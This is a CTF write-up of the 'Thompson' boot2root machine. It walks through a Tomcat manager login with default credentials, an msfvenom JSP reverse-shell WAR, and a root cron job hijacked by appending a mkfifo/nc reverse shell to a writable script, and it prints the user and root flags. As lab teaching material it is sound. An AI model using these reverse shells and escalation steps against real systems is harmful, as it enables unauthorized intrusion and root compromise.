Introduction

boot2root machine for FIT and bsides guatemala CTF

This is Thompson from THM. It’s the last one of the bsides guatemala boxes. This one took me 13 minutes. I’m on a roll.

Ports

SSH and an HTTP proxy on port 8080. We’ve got a picture of Tomcat, so it’s probably that, yes?

8080

So, let’s try some default credentials for the manager app:

tomcat:tomcat - no
tomcat:s3cret - yes

That was easy. Okay so now we need a war file:

root@kali:/opt/tryhackme/bsidesthompson# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.10.123 LPORT=1234 -f war > shell.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes

root@kali:/opt/tryhackme/bsidesthompson# nc -nvlp 1234

We are on.

Privesc

Let’s look around:

listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.167.40] 52118
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash");'
tomcat@ubuntu:/$ cd /home
cd /home
tomcat@ubuntu:/home$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x  3 root root 4.0K Aug 14  2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 14  2019 ..
4.0K drwxr-xr-x  4 jack jack 4.0K Aug 23  2019 jack
tomcat@ubuntu:/home$ cd jack
cd ls jack
tomcat@ubuntu:/home/jack$ -lash
ls -lash
total 48K
4.0K drwxr-xr-x 4 jack jack 4.0K Aug 23  2019 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 14  2019 ..
4.0K -rw------- 1 root root 1.5K Aug 14  2019 .bash_history
4.0K -rw-r--r-- 1 jack jack  220 Aug 14  2019 .bash_logout
4.0K -rw-r--r-- 1 jack jack 3.7K Aug 14  2019 .bashrc
4.0K drwx------ 2 jack jack 4.0K Aug 14  2019 .cache
4.0K -rwxrwxrwx 1 jack jack   26 Aug 14  2019 id.sh
4.0K drwxrwxr-x 2 jack jack 4.0K Aug 14  2019 .nano
4.0K -rw-r--r-- 1 jack jack  655 Aug 14  2019 .profile
   0 -rw-r--r-- 1 jack jack    0 Aug 14  2019 .sudo_as_admin_successful
4.0K -rw-r--r-- 1 root root   39 Jan  3 00:59 test.txt
4.0K -rw-rw-r-- 1 jack jack   33 Aug 14  2019 user.txt
4.0K -rw-r--r-- 1 root root  183 Aug 14  2019 .wget-hsts
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bf
tomcat@ubuntu:/home/jack$ cat test.txt
cat test.txt
uid=0(root) gid=0(root) groups=0(root)
tomcat@ubuntu:/home/jack$ file id.sh
file id.sh
id.sh: Bourne-Again shell script, ASCII text executable
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
tomcat@ubuntu:/home/jack$ ./id.sh
./id.sh
./id.sh: line 2: test.txt: Permission denied

Okay, so we have one user with a shell script that we can’t run but which appears to have been run by root. Hmmm. Let’s check the crontab:

tomcat@ubuntu:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the 'crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    cd /home/jack && bash id.sh
#
tomcat@ubuntu:/$ cd /home/jack

So there it is; a cron job running as root and executing our shell script. We’ll append some code for a reverse shell and start a new listener:

tomcat@ubuntu:/home/jack$ printf 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1235 >/tmp/f\n' >> id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1235 >/tmp/f

Great, let’s check our listener:

root@kali:/opt/tryhackme/bsidesthompson# nc -nvlp 1235
listening on [any] 1235 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.167.40] 35420
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -lash 
total 24K
4.0K drwx------  3 root root 4.0K Aug 14  2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 14  2019 ..
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwxr-xr-x  2 root root 4.0K Aug 14  2019 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   33 Aug 14  2019 root.txt
cat#  root.txt
d89d5391984c0450a95497153ae7ca3a

And another one done.